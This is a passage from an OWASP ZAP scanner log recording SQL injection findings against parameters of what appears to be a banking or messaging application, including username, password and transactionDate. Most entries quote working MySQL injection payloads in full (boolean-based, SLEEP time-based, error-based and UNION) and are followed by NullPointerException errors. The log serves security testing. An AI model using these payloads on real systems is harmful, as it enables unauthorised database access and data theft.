9195912 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9195939 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [132 AND 7409=7409] on parameter 'transactionId' 9195940 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9205836 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))oenQ)] on parameter 'msgId' 9205836 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9205936 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [1 #] on parameter 'msgId' 9205937 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9205965 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (2640=2640) THEN 2640 ELSE 2640*(SELECT 2640 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'orderby' 9205966 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9205999 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [132 AND (SELECT * FROM (SELECT(SLEEP(5)))DRiX)] on parameter 'transactionId' 9206000 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9206033 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9206041 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9206089 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9206093 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9206111 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9206114 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9206119 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [132 #] on parameter 'transactionId' 9206120 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9206488 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'msg' is not injectable 9216051 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [msgid AND (SELECT * FROM (SELECT(SLEEP(5)))NOvT)] on parameter 'orderby' 9216052 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9216671 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [textvalue' AND (SELECT * FROM (SELECT(SLEEP(5)))pgLI) AND 'kpnO'='kpnO] on parameter 'username' 9216672 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9216718 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9216723 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9216726 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9216732 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9216780 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9216784 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9216794 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9216798 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9226695 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [textvalue%' AND (SELECT * FROM (SELECT(SLEEP(5)))JlBl) AND '%'='] on parameter 'msg' 9226696 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9226734 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9226740 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 3 column in query 9226811 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9226814 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 3 column in query 9226817 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [textvalue' #] on parameter 'msg' 9226818 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9227056 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [textvalue' AND (SELECT * FROM (SELECT(SLEEP(5)))AKfz) AND 'bvRR'='bvRR] on parameter 'username' 9227057 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9227093 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9227097 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9227103 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9227108 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9227162 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9227168 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9227170 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [textvalue' #] on parameter 'username' 9227171 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9227396 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (3806=3806) THEN 3806 ELSE 3806*(SELECT 3806 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'msgid' 9227397 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9227399 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [1 AND (SELECT 2749 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2749=2749,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'msgid' 9227400 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9237254 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [textvalue2' AND (SELECT * FROM (SELECT(SLEEP(5)))zUBa) AND 'gSwJ'='gSwJ] on parameter 'password' 9237255 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9237297 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9237301 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9237305 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9237309 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9237360 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9237364 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9237365 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [textvalue2' #] on parameter 'password' 9237366 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9237386 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [1 AND 2408=2408] on parameter 'msgId' 9237387 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9237389 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [1 AND (SELECT 8918 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(8918=8918,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'msgId' 9237390 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9237440 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))eLUL)] on parameter 'msgid' 9237441 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9237585 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [10000 AND 4161=4161] on parameter 'minBalanace' 9237586 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9237588 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [10000 AND (SELECT 9849 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9849=9849,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'minBalanace' 9237589 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9247419 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))lute)] on parameter 'msgId' 9247420 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9247436 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9247440 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 3 column in query 9247484 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9247488 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 3 column in query 9247507 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9247511 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 3 column in query 9247512 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [1 #] on parameter 'msgId' 9247513 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9247594 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [132 AND 7652=7652] on parameter 'transactionId' 9247595 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9247599 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [132 AND (SELECT 9015 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9015=9015,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'transactionId' 9247600 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9247621 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [10000 AND (SELECT * FROM (SELECT(SLEEP(5)))lSXi)] on parameter 'minBalanace' 9247622 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9247645 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9247650 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9247679 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9247685 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9247712 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9247716 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9247746 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9247751 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9247809 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (4750=4750) THEN 4750 ELSE 4750*(SELECT 4750 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'transactionDate' 9247810 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9247835 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 error-based - Parameter replace with payload [(SELECT 5723 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5723=5723,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'transactionDate' 9247836 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9257635 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [132 AND (SELECT * FROM (SELECT(SLEEP(5)))woMA)] on parameter 'transactionId' 9257636 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9257655 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9257659 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9257691 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9257695 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9257713 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9257717 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9257718 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [132 #] on parameter 'transactionId' 9257719 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9257854 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [2010-02-02' AND (SELECT 5726 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5726=5726,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'aFPO'='aFPO] on parameter 'transactionDate' 9257855 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9257869 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-02-02 AND (SELECT * FROM (SELECT(SLEEP(5)))nrNh)] on parameter 'transactionDate' 9257870 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9257900 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9257905 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9257940 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9257944 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9257962 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9257967 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9257968 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [2010-02-02 #] on parameter 'transactionDate' 9257969 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9258014 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [2010-01-01' AND 7767=7767 AND 'BZMv'='BZMv] on parameter 'transactionDate' 9258015 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9258019 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [2010-01-01' AND (SELECT 9451 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9451=9451,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'KPCN'='KPCN] on parameter 'transactionDate' 9258020 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9267936 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-02-02' AND (SELECT * FROM (SELECT(SLEEP(5)))dbdT) AND 'zbVs'='zbVs] on parameter 'transactionDate' 9267937 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9268058 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-01-01' AND (SELECT * FROM (SELECT(SLEEP(5)))zCTP) AND 'iZSW'='iZSW] on parameter 'transactionDate' 9268059 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9268108 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9268113 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9268118 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9268126 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9268197 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9268205 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9268210 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9268216 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9268421 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [2010-01-01' AND 9782=9782 AND 'DYBm'='DYBm] on parameter 'transactionDate' 9268422 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9268435 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [2010-01-01' AND 5575=5575 AND 'kWAU'='kWAU] on parameter 'transactionDate' 9268436 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9268602 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [2010-01-01' AND (SELECT 7401 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7401=7401,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'WFJP'='WFJP] on parameter 'transactionDate' 9268603 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9268606 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY 